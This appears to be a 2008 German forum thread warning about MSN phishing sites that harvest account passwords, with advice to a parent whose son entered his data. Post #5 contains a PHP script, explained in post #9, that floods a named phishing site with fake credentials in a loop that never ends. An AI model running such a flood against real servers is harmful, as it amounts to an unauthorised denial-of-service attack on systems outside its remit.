Anzeige - [Hier werben / Mediadaten]
(?) Tags raten (?) (edit)
 
Reply to this topicStart new topicStart Poll
> MSN Phishing-Seite, soeben entdeckt
TTlong
Geschrieben am: Di 4.03.2008, 21:01
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 324
Mitglied seit: 8.02.2007


Hab gerade eine MSN-Message von einer "miss_srilanken@hotmail.de" bekommen. Inhalt war ein Link auf http://www.youareblocked.net. Dort möchte man doch bitte seine Benutzerdaten samt Passwort eigeben um zu schauen, wer dich geblockt oder gelöscht hat.

Ich habs testweise mal mit fiktiven Angaben gemacht (der Verdacht war ja sofort da) und siehe da, sobald man das Formular abgeschickt hat, bekommt man diese Meldung:

The system is under maintanance


Wollt euch nur eben davor warnen.


Gruß TTlong


--------------------
Linkpartner für verschiedene Erotik-Projekte gesucht => PN genügt
Top
PMEmail Poster
Top
 
 
nitrit
#2 Geschrieben am: Di 4.03.2008, 21:15 (+00:14)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 259
Mitglied seit: 8.08.2007


Leider echt schlecht... ich frag mich wie die da die richtigen MSN-Adressen rausfiltern. Ich könnte das ganz einfach per PHP mit Fakes bombardieren, bis die Datenbank explodiert biggrin.gif


--------------------
Top
PMEmail Poster
Top
 
TTlong
#3 Geschrieben am: Di 4.03.2008, 21:28 (+00:12)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 324
Mitglied seit: 8.02.2007


LOL, ich bin dabei :-)

Lasst uns den Server sprengen...


--------------------
Linkpartner für verschiedene Erotik-Projekte gesucht => PN genügt
Top
PMEmail Poster
Top
 
Duvi
#4 Geschrieben am: Di 4.03.2008, 21:39 (+00:11)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 499
Mitglied seit: 4.10.2006


ähm, da ist doch werbung von google drauf!?
msn-phishing finanziert mit google adsense? smile.gif

hab mich mit der seite jetzt nicht genauer auseinander gesetzt. aber falls es ne phishing-seite ist, ob google die kontodaten an microsoft weitergibt? don't be evil wink.gif

fällt dann wohl unter die kategorie: dümmster anzunehmender webmaster laugh.gif
Top
PMEmail Poster
Top
 
nitrit
#5 Geschrieben am: Di 4.03.2008, 21:57 (+00:17)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 259
Mitglied seit: 8.08.2007


Hier das Bombardier-Script (performanter Server vorausgesetzt biggrin.gif)

CODE

<?php
   $url    =   'http://www.youareblocked.net/index.php';
   
   $fakeAccount_runden =   500; // so oft wird ein fakeaccount erzeugt
   $cCount =   0;
   while($cCount<$fakeAccount_runden){
       $acRand =   rand(0,9999);
       $acRand2=   rand(0,99);
       $time   =   microtime();
       
       $fakeUser   =   md5(($acRand*$acRand2)+$acRand+$time);
       $fakePW     =   md5($acRand);
       
       $getURL =   $url."?user=$fakeUser&pass=$fakePW&recom=1&Submit=Get+List";
       
       $put    =   file_get_contents($getURL);
   }
?>


--------------------
Top
PMEmail Poster
Top
 
sd12
#6 Geschrieben am: Mi 5.03.2008, 08:45 (+10:48)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3581
Mitglied seit: 3.03.2004


QUOTE (nitrit @ Di 4.03.2008, 22:15)
Leider echt schlecht... ich frag mich wie die da die richtigen MSN-Adressen rausfiltern. Ich könnte das ganz einfach per PHP mit Fakes bombardieren, bis die Datenbank explodiert biggrin.gif

In dem Sie einen Loginversuch machen ;-)

Spart Euch die Arbeit.

Pro Account wird 1-2 Sekunden benötigt, dann ist klar, ob es ein Fake ist oder nicht...


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
TTlong
#7 Geschrieben am: Mi 5.03.2008, 13:16 (+04:31)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 324
Mitglied seit: 8.02.2007


Es gibt eine weitere Seite namens: http://www.blockiererte.com

Hatte heute eine eMail eines, in meiner MSN-Kontakteliste gespeicherten Freundes. Er war scheinbar nicht so schlau und hat seine Angaben preisgegeben.

Weiss nicht wie lange solche Sites schon im Umlauf sind, möchte mir aber garnicht vorstellen, was die alles mit meiner Adresse machen....


Hab vorsichtshalber beide Sites mal als Phishing-Websites gemeldet. Vielleicht verschwinden die auch ganz schnell wieder, wenn so viele Leute wie möglich diese Sites melden!?


--------------------
Linkpartner für verschiedene Erotik-Projekte gesucht => PN genügt
Top
PMEmail Poster
Top
 
Rigor
#8 Geschrieben am: Do 6.03.2008, 22:33 (+33:17)
Report PostQuote Post

AyomRank 1
**

Gruppe: Member (inaktiv)
Beiträge: 1
Mitglied seit: 6.03.2008


QUOTE (TTlong @ Mi 5.03.2008, 14:16)
Es gibt eine weitere Seite namens: http://www.blockiererte.com

Hatte heute eine eMail eines, in meiner MSN-Kontakteliste gespeicherten Freundes. Er war scheinbar nicht so schlau und hat seine Angaben preisgegeben.

Weiss nicht wie lange solche Sites schon im Umlauf sind, möchte mir aber garnicht vorstellen, was die alles mit meiner Adresse machen....


Hab vorsichtshalber beide Sites mal als Phishing-Websites gemeldet. Vielleicht verschwinden die auch ganz schnell wieder, wenn so viele Leute wie möglich diese Sites melden!?

Hallo

Auch mein Sohn war leider nicht so schlau und hat seine Daten eingegeben was passiert da jetzt eigentlich im schlimmsten Fall hab da nur recht wenig Ahnung.Bitte um Antwort wenn jemand drüber bescheid weiss!

Danke
Top
PMEmail Poster
Top
 
nitrit
#9 Geschrieben am: Fr 7.03.2008, 08:18 (+09:44)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 259
Mitglied seit: 8.08.2007


Relativ einfach. Wenn der Programmierer natürlich klug war, und die Accounts per API sofort prüft (sd12) ist es relativ sinnlos.

Aber: Man sieht eindeutig, dass er keine Cookie- oder IP-Sperre drin hat und dann auch noch alles per GET ($_GET) abfragt. Das nutzen wir zu unserem Vorteil.
Das Script generiert irgendein nicht existierenden Account und ein dazugehöriges Passwort.

Per file_get_contents wird dann die komplette URL aufgerufen und damit der Account in die Datenbank eingetragen. Sollte nun kein Check per API da sein dürfte bei stetiger Benutzung des Scripts irgendwann mal seine Datenbank überquillen vor Fake-Daten wink.gif (Könnte man auch per fsockopen o.ä. regeln, wäre aber komplizierter gewesen)...


--------------------
Top
PMEmail Poster
Top
 
Duvi
#10 Geschrieben am: Sa 8.03.2008, 01:43 (+17:24)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 499
Mitglied seit: 4.10.2006


QUOTE
Auch mein Sohn war leider nicht so schlau und hat seine Daten eingegeben was passiert da jetzt eigentlich im schlimmsten Fall hab da nur recht wenig Ahnung.Bitte um Antwort wenn jemand drüber bescheid weiss!

dein sohn die zugangsdaten zu seinem msn-account an jemand unbekannten weitergegeben. schlimmstenfalls loggt sich dieser jemand mit diesen zugangsaten ein, bevor dein sohn sein
msn-passwort geändert hat. ... und dann kann er z.b. mails lesen, oder gar beantworten. er kann
halt in den mails stöbern und nach verwertbaren informationen suchen.
und er kann das passwort ändern! so das dein sohn sich nicht mehr einloggen kann und er den account praktisch kekapert hat.
Top
PMEmail Poster
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/23275

Topic Options Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
Browser + Port 80 = Seite nicht gefunden Maik 60 3 Sa 22.11.2008, 12:04
[B] Werbelinks auf freesms-Seite flown 63 0 So 16.11.2008, 00:36
Wie optimiere ich die Seite allgemein? Cheers 309 7 Di 11.11.2008, 20:28
Wikipedia in der eigenen Seite integrieren? BartTheDevil89 345 10 Di 4.11.2008, 19:43
[B]Internationale Diablo 3 Seite [PR3, 10.00 Diablo3 93 0 Di 28.10.2008, 01:10
Fehler auf meiner Seite im IE? Christian 87 3 Fr 24.10.2008, 10:23
Teile einer Seite extern einbinden Dachs 182 4 Fr 17.10.2008, 23:16
Impressumspflicht internationale Seite Sandwolf 267 6 Di 14.10.2008, 14:18
CMS für News-Seite kare 269 16 Mo 13.10.2008, 15:17
Wie bekomme ich mehr Backlinks auf meine Seite? Soccout 1539 15 Sa 11.10.2008, 23:41




Anzeige - [Hier werben / Mediadaten]



Anzeigen


[Hier werben / Mediadaten]